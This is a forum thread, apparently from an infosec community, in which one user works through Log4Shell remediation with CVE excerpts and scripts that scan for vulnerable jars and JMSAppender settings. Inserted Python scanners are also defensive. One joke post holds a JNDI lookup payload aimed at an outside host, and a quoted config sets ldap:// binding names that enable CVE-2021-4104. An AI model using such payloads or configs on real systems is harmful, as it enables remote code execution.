Rust Martialis
May 8, 2007

At night, Bavovnyatko quietly comes to the occupiers’ bases, depots, airfields, oil refineries and other places full of flammable items and starts playing with fire there
Any Tenable Nessus users here using it to report compliance to templates from Security Center? Either roll-your-own, or the canned templates (SOX, PCI DSS, HIPAA/HITECH, etc.). Looking for good/bad reviews before I try to force security to devote project hours.

Thx

Rust Martialis
May 8, 2007

The problem is you're not evaluated on reality, you're evaluated on whatever the auditor thinks. It can be internal audit, 3rd party doing your annual 3402 SOC 1, a QSA doing PCI, whatever. They want to see documentation you have a security policy, appropriate controls, and that you follow them. The thing is that running a Nessus report using whatever Tenable calls a "HIPAA Compliance Template" is something you can wave at an auditor based on an arguably *independent* evaluation.

Yeah it's probably mostly meaningless, but ticking boxes means not having red flags in your goddamn audit findings. Those cost *money*, **now**, to fix. And customers get real pissy when you're in material breach.

Rust Martialis
May 8, 2007


BangersInMyKnickers posted:

Clearly lying to auditors is the most viable and prudent path forward

Then the FDA "hi you can't make more drugs now til you fix this poo poo" catches you. :/

Rust Martialis
May 8, 2007

So my initial take is the offending class file is in log4j-core-*.jar, but there's oodles of plain log4j.jar files out there and Nessus tags those and v1 as vulnerable. Customer running scans is demanding we handle v1 as part of 44228 and I am pushing back.

We initially ran a script via HPSA crawling thousands of servers for jar files.

Day 5 dawns. Still missing patches from major vendors. Off to check vendor websites.

Rust Martialis
May 8, 2007

We had at least one instance where a team renamed the log4j jar file, no feedback yet if the app barfed

Rust Martialis
May 8, 2007

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046

"It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (<2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)."

Dehumaniiiiize yourseeeeelllllllllf

Bonus:
"Unfortunately, we have an example that Redhat has used log4j in what is called an "uberjar" where the file name does not directly indicate that there is log4j inside the jar and where the class namespaces have been changed."

:murder:

Rust Martialis fucked around with this message at 10:07 on Dec 15, 2021

Rust Martialis
May 8, 2007

If anyone finds a script for either shell or PowerShell that can recursively crawl an entire disk, and for each .jar file it sees, list all the class files in it, including any in a jar file *nested* in the jar file, please post a link.

Right now some vendors are saying patches next week. The list of vulnerable Oracle and Cisco products is huge. The amount of 1.x in things like SAP is mind bending.

Nessus does have local and remote (callback) plugins and you might get try-it licenses.

Rust Martialis
May 8, 2007

I want something I can pass to the HPSA team to run on every one of thousands of servers.

Rust Martialis
May 8, 2007

Ugly hack but it 'works' with bsdtar 3.4.3 on FreeBSD:

I created a file foo.class, created a tarfile called foo.jar, then tarred bar.class and foo.jar into bar.jar. Trying to simulate a nested jar file inside a jar file. You can concatenate tar files to list the content, just keep sending it to stdout, alternating x and t commands.

pre:
> tar xvfO bar.jar | tar xvfO - | tar tvfO - | tar xvfO - | tar tvf -
x bar.class
x foo.jar
x foo.class

then uhh munging it into find

> find . -name "*.jar" -exec sh -c 'tar xvfO "{}" | tar xvfO - | tar tvfO - | tar xvfO - | tar tvf -' \;
x bar.class
x foo.jar
x foo.class

I am such a bad coder.


PowerShell script on GitHub https://www.reddit.com/r/PowerShell/comments/resukw/log4shell_scanner_multiserver_massively_parallel/

Anyone who knows PowerShell, comment on it?

Rust Martialis fucked around with this message at 19:20 on Dec 15, 2021

Rust Martialis
May 8, 2007

PowerShell script I modified - scans ALL drives for jar files and hunts for JndiLookup.class in them, spits it out. Base script not mine.

pre:
# Enumerate every filesystem drive, walk it for *.jar files, and print the path of
# any jar whose bytes contain "JndiLookup.class". Zip central directories store
# entry names as plain text, so a flat string match finds the class in a jar;
# it will miss a copy inside a *compressed* nested jar.
$Drives = Get-PSDrive -PSProvider 'FileSystem'

foreach ($Drive in $Drives) {
    Write-Output $Drive
    Get-ChildItem -Path $Drive.Root -Recurse -Force -Include *.jar -ErrorAction SilentlyContinue |
        ForEach-Object { Select-String -Pattern "JndiLookup.class" -Path $_.FullName -SimpleMatch } |
        Select-Object -ExpandProperty Path
}
Hope this helps. someone wipe my redtext if you like it enough :P

Rust Martialis
May 8, 2007


evil_bunnY posted:

2.16 is apparently still problematic LMBO

Circumcision of the offending JndiLookup.class file sounds better and better every loving second

Rust Martialis
May 8, 2007


Did the image fail to convey itself?

Rust Martialis
May 8, 2007

So for log4j v1, the "solution" is to "audit your log4j.properties or log4j.xml files" to make sure JMSAppender isn't configured insecurely.

Should be easy enough to run a script to find and search log4j config files for JMSAppender config lines.... anyone got a script or do I need to try my pathetic PowerShell script skills.

Rust Martialis
May 8, 2007

CVE-2021-4104 - reading the CVE at https://access.redhat.com/security/cve/CVE-2021-4104 and the bugzilla page https://bugzilla.redhat.com/show_bug.cgi?id=2031667 , it reads to me like version 1 is not really a remote exploit at all?

A commenter on bugzilla points out it requires that JMSAppender be enabled in log4j.config, but also that remote exploits require that additional settings in the file be set locally to point to an attacker's site:
pre:
"you can execute a command only by putting it in the properties TopicBindingName or TopicConnectionFactoryBindingName. For example:

log4j.appender.jms=org.apache.log4j.net.JMSAppender

log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory

log4j.appender.jms.ProviderURL=tcp://localhost:61616

>>>log4j.appender.jms.TopicBindingName=ldap://host:port/a

>>>log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a"
If I've read this correctly, a script (PowerShell or UNIX shell) should be able to search a target system for log4j.config and log4j.xml files and spit out the values for log4j.appender.jms, and also the values of TopicBindingName and TopicConnectionFactoryBindingName.

Lastly the script should make the config file read-only by *anyone* including the application.

I'm sure someone's already figured this out a long time ago but I am home with a sore arm since I got my booster yesterday.

Does this hold together? Did I gently caress up somewhere?
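The outline in the post above (find the log4j config files, print the log4j.appender.jms value and the two binding names) written out as an added example. It is not a script from this thread or from Red Hat, and it is in Python rather than PowerShell so it can create its own sample files with the standard library and run anywhere. It goes one step further than the outline: it keys on the appender class rather than on an appender called "jms", reads both the .properties and the XML form of a log4j 1.x config, and flags a binding name that is a URL, which is the condition the Bugzilla comment describes. The sample log4j.properties reuses the values quoted above; the log4j.xml, the file names and the directory layout are constructed for the demonstration. Making the files read-only is left to the caller.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
WATCHED_KEYS = ("ProviderURL", "TopicBindingName", "TopicConnectionFactoryBindingName")
CONFIG_NAMES = ("log4j.properties", "log4j.xml", "log4j.config")
# A binding *name* should be a plain JNDI name. A naming-service URL here points the
# lookup at an external server, which is the CVE-2021-4104 condition.
URL_RE = re.compile(r"^\s*(ldap|ldaps|rmi|iiop|dns)://", re.I)


def parse_properties(text):
    """Return {appender: {key: value}} for every JMSAppender in a log4j 1.x
    .properties file ('#'/'!' comments skipped, first '=' is the separator)."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    appenders = {}
    for key, value in props.items():
        m = re.fullmatch(r"log4j\.appender\.([^.]+)", key)
        if m and value == JMS_APPENDER:
            name = m.group(1)
            appenders[name] = {k: props.get(f"log4j.appender.{name}.{k}") for k in WATCHED_KEYS}
    return appenders


def parse_xml(text):
    """Same result for the XML form: <appender class=...> with <param name= value=/>."""
    appenders = {}
    for app in ET.fromstring(text).iter("appender"):
        if app.get("class") == JMS_APPENDER:
            params = {p.get("name"): p.get("value") for p in app.findall("param")}
            appenders[app.get("name")] = {k: params.get(k) for k in WATCHED_KEYS}
    return appenders


def audit_tree(root):
    """Walk `root` for log4j 1.x config files; return sorted rows
    (relative_path, appender, key, value, flagged), one per watched key of each
    JMSAppender. flagged is True when a binding name is a naming-service URL."""
    rows = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower() not in CONFIG_NAMES:
                continue
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            appenders = parse_xml(text) if fn.lower().endswith(".xml") else parse_properties(text)
            for name, cfg in appenders.items():
                for key, value in cfg.items():
                    flagged = key != "ProviderURL" and bool(value) and bool(URL_RE.match(value))
                    rows.append((rel, name, key, value, flagged))
    return sorted(rows, key=lambda r: (r[0], r[1], r[2]))


# Constructed sample: the properties values are the ones from the Bugzilla comment.
SAMPLE_PROPERTIES = """\
log4j.rootLogger=INFO, jms
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory
log4j.appender.jms.ProviderURL=tcp://localhost:61616
log4j.appender.jms.TopicBindingName=ldap://host:port/a
log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a
"""

# Constructed sample: a JMSAppender with plain JNDI names, i.e. the benign shape.
SAMPLE_XML = """\
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="audit" class="org.apache.log4j.net.JMSAppender">
    <param name="ProviderURL" value="tcp://localhost:61616"/>
    <param name="TopicBindingName" value="auditTopic"/>
    <param name="TopicConnectionFactoryBindingName" value="ConnectionFactory"/>
  </appender>
  <appender name="file" class="org.apache.log4j.FileAppender">
    <param name="File" value="app.log"/>
  </appender>
</log4j:configuration>
"""


def run_demo():
    """Write the two samples under hypothetical paths in a temp dir and audit them."""
    with tempfile.TemporaryDirectory() as root:
        for rel, text in {"conf/log4j.properties": SAMPLE_PROPERTIES, "webapp/log4j.xml": SAMPLE_XML}.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(text)
        return audit_tree(root)


if __name__ == "__main__":
    for rel, name, key, value, flagged in run_demo():
        print(f"{'FLAG' if flagged else '    '} {rel} [{name}] {key}={value}")
```

Running it prints six rows and flags only the two ldap:// binding names from the properties file; the XML appender is listed so the reviewer still sees that JMSAppender is in use, but nothing in it is flagged. Pointing `audit_tree` at a real root is the whole deployment story, which is why it returns plain tuples rather than printing.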

Rust Martialis
May 8, 2007

lovely Log4j v1 scanner

pre:
# Walk every filesystem drive for log4j 1.x config files and print each line that
# mentions log4j.appender.jms (path, line number, line). log4j 1.x reads
# log4j.properties or log4j.xml by default, so those are included alongside the
# log4j.config name from the original post. Note the pattern only catches an
# appender literally named "jms".
$Drives = Get-PSDrive -PSProvider 'FileSystem'

foreach ($Drive in $Drives) {
    Get-ChildItem -Path $Drive.Root -Recurse -Force -Include log4j.properties,log4j.xml,log4j.config -ErrorAction SilentlyContinue |
        ForEach-Object { Select-String -Pattern "log4j.appender.jms" -Path $_.FullName -SimpleMatch } |
        Select-Object -Property Path, LineNumber, Line |
        Format-Table -HideTableHeaders
}
Looks on all drives for and prints out the values on any line in a log4j.config or log4j.xml file with the log4j.appender.jms string in it: full path, line in file, value found.

pre:
N:\log4j.config          1 log4j.appender.jms=org.apache.log4j.net.JMSAppender
N:\log4j.config          2 log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialCont...
N:\log4j.config          3 log4j.appender.jms.ProviderURL=tcp://localhost:61616
N:\log4j.config          4 log4j.appender.jms.TopicBindingName=ldap://host:port/a
N:\log4j.config          5 log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a
Of course some app coders probably hide their log4j config statements in some other loving file. You could just wildcard the *.config and *.xml

Rust Martialis fucked around with this message at 21:00 on Dec 19, 2021

Rust Martialis
May 8, 2007

We ran the script that peeks inside jar files for JndiLookup.class and yeah, some apps repackage class files. Thought you could just look for log4j-core-2.x.jar? Nope!

pre:
C:\Program Files\Commvault\ContentStore\Base\DbJars\DbArchiveEngine.jar
C:\Program Files\Hewlett-Packard\CSArobocopy\Tools\lib\CLI-lib.jar
D:\apps\elk\7.4.0\logstash\vendor\bundle\jruby\2.5.0\gems\logstash-input-tcp-6.0.3-java\vendor\jar-dependencies\org\logstash\inputs\logstash-input-tcp\6.0.3\logstash-input-tcp-6.0.3.jar
Also a bunch of software I can't post because it might identify the customers affected.

Rust Martialis
May 8, 2007

The myriad ways of obfuscating the attack would get past your ngFW but would also be unreadable

Rust Martialis
May 8, 2007

I thought you could engineer the callback to any port, so blocking LDAP can't be port-based

Rust Martialis
May 8, 2007

New! Improved! Script!

Scans everything under root for jar files, then looks to see if the jar file has JndiLookup.class in it, and if it does, checks the MANIFEST.MF for a version.

pre:
$ cat manifestscan.sh
#!/bin/bash
# Walk the filesystem for *.jar files, report any jar that contains a
# JndiLookup.class entry, and pull Log4jReleaseVersion from its MANIFEST.MF.
# File names are passed NUL-delimited and quoted so paths with spaces survive.

printf "%-16s|%-8s|%-64s|%-20s\n" "Hostname" "Version" "Jar File" "Class"
find / -name '*.jar' -print0 2>/dev/null | while IFS= read -r -d '' n
do
        CLASS="$(unzip -l "$n" 2>/dev/null | grep -i 'jndilookup.class' | awk '{print $4}' )"
        if [[ -n ${CLASS} ]]; then
                # manifest lines end in CRLF; sed drops the stray \r
                VERSION="$(unzip -q -c "$n" META-INF/MANIFEST.MF 2>/dev/null | grep "Log4jReleaseVersion:" | awk '{print $2}' | sed 's/\s//g' )"
                printf "%16s|%8s|%64s|%20s\n" "$HOSTNAME" "$VERSION" "$n" "$CLASS"
        fi
done

$ ./manifestscan.sh
Hostname        |Version |Jar File                                                        |Class
        hostname|  2.17.0|             /TEST/apache-log4j-2.17.0-bin/log4j-core-2.17.0.jar|org/apache/logging/log4j/core/lookup/JndiLookup.class

Rust Martialis fucked around with this message at 13:02 on Dec 22, 2021

Rust Martialis
May 8, 2007


Saukkis posted:

Now go down the next level and make the script scan for any .jars inside the .jars, unpack them and look for JNDI. Oh, and also include .wars in your scan.

I have to say this has been more than the usual vulnerability. As a sys op group we usually try to figure how much to panic, then we twiddle our thumbs while waiting for a patch from Red Hat, Ubuntu or VMware. Screw trying to binary patch or compile from sources. But this time the interesting part has been trying to locate where we have it and then we can just zip-delete the problem or drop in patched jars from the upstream.

First round was lsof-grepping for any log4j jars. Then we extended that to locate and find. Then we found out they can be inside .wars and need to start recursive searching. Biggest annoyance has been containers since we can't as easily fix them.

Could I invoke auditd somehow on Linux to scream any time a fopen( ) or open( ) was done on any file with jndi in the name, I wonder
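The "next level" Saukkis asks for above, and the nested-jar crawler requested earlier on this page, as an added example. It is not any poster's or vendor's script, and it is in Python rather than the shell/PowerShell used in the thread so it can build its own sample jars with the standard zipfile module and run without zip or unzip installed. It walks a directory for jars, wars and ears, descends into archives stored inside archives, matches on the class file name rather than its package path (so the relocated-namespace uberjar case quoted earlier is still caught), and reads Log4jReleaseVersion from the manifest the way the bash script does. The fixture tree (a log4j-core jar, a war nesting that jar, a shaded uberjar without log4j in its name, and a clean jar) and all file names in it are constructed for the demonstration.

```python
import io
import os
import tempfile
import zipfile

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
TARGET_CLASS = "JndiLookup.class"


def _release_version(zf):
    """Return Log4jReleaseVersion from META-INF/MANIFEST.MF, or None if absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Log4jReleaseVersion:"):
            return line.split(":", 1)[1].strip()
    return None


def scan_archive_bytes(data, chain):
    """Return [(chain, entry, version)] for every JndiLookup.class in this archive
    or in any archive nested inside it. `chain` is the outer path; nested members
    are appended with '!' (the jar:file:...!/ convention)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip at all (renamed file, corrupt download)
    with zf:
        version = _release_version(zf)
        for name in zf.namelist():
            base = name.rsplit("/", 1)[-1]
            # Compare the class file name, not its package path, so a shaded copy
            # relocated into another namespace is still reported.
            if base == TARGET_CLASS:
                findings.append((chain, name, version))
            elif name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(scan_archive_bytes(zf.read(name), chain + "!" + name))
    return findings


def scan_tree(root):
    """Walk `root`, scan every archive found, descend into nested ones.
    Paths are reported relative to `root` with forward slashes."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                findings.extend(scan_archive_bytes(fh.read(), rel))
    return sorted(findings, key=lambda f: (f[0], f[1]))


def _zip_bytes(entries):
    """Build an in-memory zip from a {name: str|bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_fixture(root):
    """Constructed sample tree; file names are hypothetical, not real vendor software."""
    class_bytes = b"\xca\xfe\xba\xbe"  # just the class-file magic, enough for the scan
    core = _zip_bytes({
        "META-INF/MANIFEST.MF": "Manifest-Version: 1.0\r\nLog4jReleaseVersion: 2.14.1\r\n",
        "org/apache/logging/log4j/core/lookup/JndiLookup.class": class_bytes,
    })
    files = {
        "lib/log4j-core-2.14.1.jar": core,
        # the same jar inside WEB-INF/lib of a war: only a nested scan sees it
        "webapps/app.war": _zip_bytes({"WEB-INF/lib/log4j-core-2.14.1.jar": core}),
        # uberjar: no log4j in the name, class relocated, no release version
        "vendor/tool.jar": _zip_bytes({
            "META-INF/MANIFEST.MF": "Manifest-Version: 1.0\r\n",
            "shaded/logging/lookup/JndiLookup.class": class_bytes,
        }),
        "lib/clean.jar": _zip_bytes({"com/example/App.class": class_bytes}),
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def run_demo():
    """Build the fixture in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for chain, entry, version in run_demo():
        print(f"{version or '?':>8} | {chain} -> {entry}")
```

The demo reports three hits: the plain core jar with its 2.14.1 version, the same jar reached through app.war!WEB-INF/lib/..., and the uberjar with no version string because its manifest carries none. The clean jar produces nothing. Everything is held in memory, so a nested archive is never written to disk during the scan; on a real tree the only change is the root passed to `scan_tree`.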

Rust Martialis
May 8, 2007


BonHair posted:

The best cyber attack weapon is probably a cleaning trolley. That'll get you past most physical perimeters, and from there you can probably install a small wireless keylogger in selected computers or docking stations. Congratulations, you now have full access to anything not protected by two factor. Unless you use being on the internal network as a second factor, in which case you also have that.

Plus with certain attacks like stealing session cookies you can break some 2FA anyhow.

Rust Martialis
May 8, 2007

Woke up, saw 9 unread, thought, oh gently caress, 2.18.0

Rust Martialis
May 8, 2007

More JNDI goodness

https://www.zdnet.com/article/jfrog-researchers-find-jndi-vulnerability-in-h2-database-consoles-similar-to-log4shell/

H2 database, not LOG4J

Rust Martialis
May 8, 2007


spankmeister posted:

They probably learned that in their CISSP certification or something and now they're using it everywhere.

Lol "The CFR Triad"

Rust Martialis
May 8, 2007


Defenestrategy posted:

Chips fries and a reuben? Sounds good to me.

Confidentiality Fries Reuben

Rust Martialis
May 8, 2007


Martytoof posted:

Is it still probateable to just post a meme because I think this one is pretty on the nose…



ICS dog

Rust Martialis
May 8, 2007

Who knowingly exposes a NAS to the Internet wtf

Rust Martialis
May 8, 2007


KillHour posted:

"Do you have any questions for me?"

"Yes... what does your company do."

"Nothing. I just have all these servers and I feel like I need to use them for something. Host a Minecraft server or something, IDGAF."


pre:
${jndì:ldaps://somethingawful.com/forums}

Rust Martialis
May 8, 2007


Potato Salad posted:

doesn't work, SA has no .class

It does have jars though

Rust Martialis
May 8, 2007

Any Eurogoons interested in discussing NIS 2?

Rust Martialis
May 8, 2007


SlowBloke posted:

I’m skeptical about it since it only mandates audit on a limited basis and the control/management entities it mandates at member basis have been created already by most nato members. What are your thoughts?

I work for a data centre service provider, and we provide services for a number of public and private entities currently deemed either essential or important or likely to be deemed as such once NIS 2 is passed. I am our senior subject matter expert on security including governance, risk and compliance.

The difference between providing services to an essential entity and *being* an essential entity concerns me. Annex I lists data centre service providers as a class under Digital Infrastructure open to be considered essential.

If we're essential, then I have to go through notification of the "competent authorities" of any actual serious incident or any potential significant threat within 24 hours, as well as notifying all my customers of any impact and possible mitigations "without undue delay". If we're not deemed essential, I don't face the same reporting rules.

Now the directive will probably be approved this summer with an implementation period of something like 18 months. So I have to advise my CISO and CEO if we need to make sure our vulnerability reporting is up to snuff - stricter than GDPR breach reporting.

The CEO and VP Legal will probably also be interested that they can be suspended for breaches.

Rust Martialis
May 8, 2007

Faaaack

Ed: faaaaaaack

Rust Martialis fucked around with this message at 18:42 on Feb 1, 2022

Rust Martialis
May 8, 2007


BonHair posted:

Listen, we bought this tool to find bad stuff, and the tool says your stuff is bad. No, we don't know or care how the tool works, the point is that it's expensive and thus right.

Oh god, this in spades. One customer runs their own Nessus scans and regularly screams about false positives, and during log4j where the v2 bug was a CVSS of 9.8 ("fix now"), the v1 stuff was 6.2, so put on the "fix later" pile unless Internet facing.

Yet they were screaming at us daily why we hadn't patched *all* the v1 poo poo because Nessus just looked for files named log4j*.jar. Like vendors taking *forever* to announce patch dates and them all "patch this!!!" when places like Cisco were saying in the week before Christmas that "patches for this will be available January 24th".

I just blocked it out and let the account team deal with it. Apparently they are still mad.

Rust Martialis
May 8, 2007


SlowBloke posted:

Sorry to interrupt the ssl chat, just wanted to inform that qnap has pushed a qts 5.0 update to address the latest samba cve, samba version is now 4.13.17 .

Copy, paste, to: team-backup, subject: stop asking me when the patch is out, send

Thx

Rust Martialis
May 8, 2007

Apparently SAP released a full kernel upgrade which we implemented over the weekend.

Fyi if your org has SAP

Ed: https://www.cvedetails.com/cve/CVE-2022-22536/

Rust Martialis
May 8, 2007


KillHour posted:

You missed the one where the attackers had taken over the AD server and had the malware pushed to the entire organization via GPO months in advance to be executed all at once :eyepop:

Lockbit2 spreads via GPO. It's the one that hit Vestas late in 2021.

Helping them clean up was... stressful.

Rust Martialis
May 8, 2007


Ynglaur posted:

The free version of OpenDNS might be enough for you. I can't remember if the EULA forbids use by commercial entities or not, so you'd need to check that, and I imagine setting up DNS on mobile devices might be a pain. Still, it would be cheap from a licensing, if not a labor, perspective.

One assumes a MDM solution?

Rust Martialis
May 8, 2007


BonHair posted:

I'm in the business of infosec management software. Every single one of our customers is screaming about getting some power bi reports for security stuff. Incidentally, none of them know what they want beyond that, except "some way to track if it's good or bad across time".
If you are somehow able to take the gigantic amount of data that exists in the infosec department and transform it into a pie chart, you're gonna be a huge asset, because now you can explain that poo poo's hosed to non-nerds.

DO. NOT. BUY. QLIK.

Rust Martialis
May 8, 2007


Ynglaur posted:

For a while I kind of equated Power BI, Tableau, and Qlik for most data visualization work. Some of my data viz colleagues have recently (last year or so) kind of waved me off of that idea. They generally land on Tableau or Power BI.

Is there a short version of what's behind this, or is it nuanced and something that requires some domain knowledge to appreciate?

Nah, just I find QlikView and QlikSense ugly and hate coding it. Plus you can hire power bi coders much easier.

Rust Martialis
May 8, 2007


CLAM DOWN posted:

who is wes?!
